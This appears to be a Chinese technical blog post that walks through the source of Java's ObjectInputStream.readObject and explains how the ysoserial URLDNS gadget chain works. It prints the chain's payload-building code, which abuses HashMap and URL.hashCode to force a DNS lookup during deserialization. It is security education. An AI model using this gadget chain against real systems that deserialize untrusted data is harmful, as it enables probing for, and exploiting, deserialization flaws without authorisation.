java readobject源碼解讀和反序列化分析

首先看java.io.readobject函數:

public final Object readObject()
        throws IOException, ClassNotFoundException
    {
        if (enableOverride) {
            return readObjectOverride();
        }

        // if nested read, passHandle contains handle of enclosing object
        int outerHandle = passHandle;
        try {
            Object obj = readObject0(false);
            handles.markDependency(outerHandle, passHandle);
            ClassNotFoundException ex = handles.lookupException(passHandle);
            if (ex != null) {
                throw ex;
            }
            if (depth == 0) {
                vlist.doCallbacks();
            }
            return obj;
        } finally {
            passHandle = outerHandle;
            if (closed && depth == 0) {
                clear();
            }
        }
    }

重點分析readObject0這個函數:

private Object readObject0(boolean unshared) throws IOException {
    boolean oldMode = bin.getBlockDataMode();
    if (oldMode) {
        int remain = bin.currentBlockRemaining();
        if (remain > 0) {
            throw new OptionalDataException(remain);
        } else if (defaultDataEnd) {
            /*
                 * Fix for 4360508: stream is currently at the end of a field
                 * value block written via default serialization; since there
                 * is no terminating TC_ENDBLOCKDATA tag, simulate
                 * end-of-custom-data behavior explicitly.
                 */
            throw new OptionalDataException(true);
        }
        // 這裏將BlockDataMode置false
        bin.setBlockDataMode(false);
    }

    byte tc;
    // 從序列化信息中獲取第一個字節
    while ((tc = bin.peekByte()) == TC_RESET) {
        bin.readByte();
        handleReset();
    }

    depth++;
    totalObjectRefs++;
    // 如果是對象的反序列化,這裏tc=115,即0x73,所以走下面的TC_OBJECT
    try {
        switch (tc) {
            case TC_NULL:
                return readNull();

            case TC_REFERENCE:
                return readHandle(unshared);

            case TC_CLASS:
                return readClass(unshared);

            case TC_CLASSDESC:
            case TC_PROXYCLASSDESC:
                return readClassDesc(unshared);

            case TC_STRING:
            case TC_LONGSTRING:
                return checkResolve(readString(unshared));

            case TC_ARRAY:
                return checkResolve(readArray(unshared));

            case TC_ENUM:
                return checkResolve(readEnum(unshared));

            case TC_OBJECT:
                return checkResolve(readOrdinaryObject(unshared));

            case TC_EXCEPTION:
                IOException ex = readFatalException();
                throw new WriteAbortedException("writing aborted", ex);

            case TC_BLOCKDATA:
            case TC_BLOCKDATALONG:
                if (oldMode) {
                    bin.setBlockDataMode(true);
                    bin.peek();             // force header read
                    throw new OptionalDataException(
                        bin.currentBlockRemaining());
                } else {
                    throw new StreamCorruptedException(
                        "unexpected block data");
                }

            case TC_ENDBLOCKDATA:
                if (oldMode) {
                    throw new OptionalDataException(true);
                } else {
                    throw new StreamCorruptedException(
                        "unexpected end of block data");
                }

            default:
                throw new StreamCorruptedException(
                    String.format("invalid type code: %02X", tc));
        }
    } finally {
        depth--;
        bin.setBlockDataMode(oldMode);
    }
}

再進入readOrdinaryObject:

private Object readOrdinaryObject(boolean unshared)
    throws IOException
{
    if (bin.readByte() != TC_OBJECT) {
        throw new InternalError();
    }
    // name = com.xxx.xxx.xxx.User
    // suid = 1
    // filed = User中的屬性名及類型
    ObjectStreamClass desc = readClassDesc(false);
    desc.checkDeserialize();

    Class<?> cl = desc.forClass();
    if (cl == String.class || cl == Class.class
            || cl == ObjectStreamClass.class) {
        throw new InvalidClassException("invalid class descriptor");
    }

    Object obj;
    try {
        obj = desc.isInstantiable() ? desc.newInstance() : null;
    } catch (Exception ex) {
        throw (IOException) new InvalidClassException(
            desc.forClass().getName(),
            "unable to create instance").initCause(ex);
    }

    passHandle = handles.assign(unshared ? unsharedMarker : obj);
    ClassNotFoundException resolveEx = desc.getResolveException();
    if (resolveEx != null) {
        handles.markException(passHandle, resolveEx);
    }

    if (desc.isExternalizable()) {
        readExternalData((Externalizable) obj, desc);
    } else {
        // 走這個分支去反序列化obj對象
        readSerialData(obj, desc);
    }

    handles.finish(passHandle);

    if (obj != null &&
        handles.lookupException(passHandle) == null &&
        desc.hasReadResolveMethod())
    {
        Object rep = desc.invokeReadResolve(obj);
        if (unshared && rep.getClass().isArray()) {
            rep = cloneArray(rep);
        }
        if (rep != obj) {
            // Filter the replacement object
            if (rep != null) {
                if (rep.getClass().isArray()) {
                    filterCheck(rep.getClass(), Array.getLength(rep));
                } else {
                    filterCheck(rep.getClass(), -1);
                }
            }
            handles.setObject(passHandle, obj = rep);
        }
    }

    return obj;
}

再進入到readSerialData這個函數裏面:

private void readSerialData(Object obj, ObjectStreamClass desc)
    throws IOException
{
    //從父類開始
    ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
    for (int i = 0; i < slots.length; i++) {
        ObjectStreamClass slotDesc = slots[i].desc;

        if (slots[i].hasData) {
            if (obj != null &&
                slotDesc.hasReadObjectMethod() &&
                handles.lookupException(passHandle) == null)
            {
                ...
                    //如果有readObject()執行
                    slotDesc.invokeReadObject(obj, this);
                ...
            } else {
                //如果沒有的話就執行默認的反序列化,與序列化類似
                defaultReadFields(obj, slotDesc);
            }
            if (slotDesc.hasWriteObjectData()) {
                skipCustomData();
            } else {
                bin.setBlockDataMode(false);
            }
        } else {
            if (obj != null &&
                slotDesc.hasReadObjectNoDataMethod() &&
                handles.lookupException(passHandle) == null)
            {
                slotDesc.invokeReadObjectNoData(obj);
            }
        }
    }
}

在readSerialData中比較關鍵的是

if (obj != null &&
                slotDesc.hasReadObjectMethod() &&
                handles.lookupException(passHandle) == null)

這個if判斷,其中slotDesc.hasReadObjectMethod()獲取的是readObjectMethod這個屬性,如果反序列化的類沒有重寫readobject(),那麼readObjectMethod這個屬性就是空,如果這個類重寫了readobject(),那麼就會進入到if之中的

slotDesc.invokeReadObject(obj, this);

所有的關鍵都在invokeReadObject裏面,這個函數會傳入類之中的重寫的readobject
在說invokeReadObject之前,先看看能夠觸發這個if語句的User類,以及執行User中的readobject方法:
在這裏插入圖片描述

這樣只要尋找重寫readobject的類就好了,在ysoserial就幫我們找到一系列利用鏈,分析最簡單的利用鏈URLDNS:

public Object getObject(String... url) throws Exception {
        URLStreamHandler handler = new URLDNS.SilentURLStreamHandler();
        HashMap ht = new HashMap();
        URL u = new URL((URL)null, url[0], handler);
        ht.put(u, url);
        Reflections.setFieldValue(u, "hashCode", -1);
        return ht;
    }

首先看到這個利用鏈調用的是HashMap,返回的也是HashMap對象ht,查看HashMap類,查找readobject這個函數,赫然發現:
在這裏插入圖片描述

private void readObject(java.io.ObjectInputStream s)
         throws IOException, ClassNotFoundException
    {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                               loadFactor);

        // set hashSeed (can only happen after VM boot)
        Holder.UNSAFE.putIntVolatile(this, Holder.HASHSEED_OFFSET,
                sun.misc.Hashing.randomHashSeed(this));

        // Read in number of buckets and allocate the bucket array;
        s.readInt(); // ignored

        // Read number of mappings
        int mappings = s.readInt();
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                               mappings);

        int initialCapacity = (int) Math.min(
                // capacity chosen by number of mappings
                // and desired load (if >= 0.25)
                mappings * Math.min(1 / loadFactor, 4.0f),
                // we have limits...
                HashMap.MAXIMUM_CAPACITY);
        int capacity = 1;
        // find smallest power of two which holds all mappings
        while (capacity < initialCapacity) {
            capacity <<= 1;
        }

        table = new Entry[capacity];
        threshold = (int) Math.min(capacity * loadFactor, MAXIMUM_CAPACITY + 1);
        useAltHashing = sun.misc.VM.isBooted() &&
                (capacity >= Holder.ALTERNATIVE_HASHING_THRESHOLD);

        init();  // Give subclass a chance to do its thing.

        // Read the keys and values, and put the mappings in the HashMap
        for (int i=0; i<mappings; i++) {
            K key = (K) s.readObject();
            V value = (V) s.readObject();
            putForCreate(key, value);
        }
    }

看到最後面那個for循環:

for (int i=0; i<mappings; i++) {
            K key = (K) s.readObject();
            V value = (V) s.readObject();
            putForCreate(key, value);
        }

可以看到它對每一個key和value都執行了readobject,之後把key和value放入putForCreate這個函數中

private void putForCreate(K key, V value) {
        int hash = null == key ? 0 : hash(key);
        int i = indexFor(hash, table.length);

        /**
         * Look for preexisting entry for key.  This will never happen for
         * clone or deserialize.  It will only happen for construction if the
         * input Map is a sorted map whose ordering is inconsistent w/ equals.
         */
        for (Entry<K,V> e = table[i]; e != null; e = e.next) {
            Object k;
            if (e.hash == hash &&
                ((k = e.key) == key || (key != null && key.equals(k)))) {
                e.value = value;
                return;
            }
        }

        createEntry(hash, key, value, i);
    }

在putForCreate第一行調用了hash(key)這個函數,注入這個函數:

final int hash(Object k) {
        int h = 0;
        if (useAltHashing) {
            if (k instanceof String) {
                return sun.misc.Hashing.stringHash32((String) k);
            }
            h = hashSeed;
        }

        h ^= k.hashCode();

        // This function ensures that hashCodes that differ only by
        // constant multiples at each bit position have a bounded
        // number of collisions (approximately 8 at default load factor).
        h ^= (h >>> 20) ^ (h >>> 12);
        return h ^ (h >>> 7) ^ (h >>> 4);
    }

走到這一步就要好好看看java的調用鏈,如下圖:
在這裏插入圖片描述

看到第9行h ^= k.hashCode(); 這裏的k調用了hashCode這個函數

再看URLDNS這個利用鏈中後面加入的如下代碼

URL u = new URL(null, url, handler); //url對象作爲key
ht.put(u, url); //把url對象和url放入hashmap中,變成{u:url}的形式
Reflections.setFieldValue(u, "hashCode", -1); //觸發hashcode

URLDNS 中使⽤用的這個key是⼀一個 java.net.URL 對象,去查看java.net.hashCode這個函數

public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

此時, handler 是 URLStreamHandler 對象(的某個⼦子類對象),繼續跟進其 hashCode ⽅方法,在進入hashCode這個函數之前有個判斷是if (hashCode != -1)這個判斷要求hashCode這個私有變量不能爲-1的時候就直接返回hashCode,所以我要想辦法把這個hashCode私有變量設置爲-1,所以在URLDNS這個利用鏈中,使用 Reflections.setFieldValue(u, "hashCode", -1);設置hashCode這個私有屬性爲-1,這樣在執行到hashCode函數中之後,就可以進入到handler.hashCode(this)這一步了
在這裏插入圖片描述
(上圖爲設置hashCode這個私有變量之後的值)

protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

這⾥裏裏有調⽤用 getHostAddress ⽅方法,繼續跟進:

protected synchronized InetAddress getHostAddress(URL u) {
        if (u.hostAddress != null)
            return u.hostAddress;

        String host = u.getHost();
        if (host == null || host.equals("")) {
            return null;
        } else {
            try {
                u.hostAddress = InetAddress.getByName(host);
            } catch (UnknownHostException ex) {
                return null;
            } catch (SecurityException se) {
                return null;
            }
        }
        return u.hostAddress;
    }

這⾥裏裏 InetAddress.getByName(host) 的作⽤用是根據主機名,獲取其IP地址,在⽹網絡上其實就是⼀一次 DNS查詢。到這⾥裏裏就不不必要再跟了了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章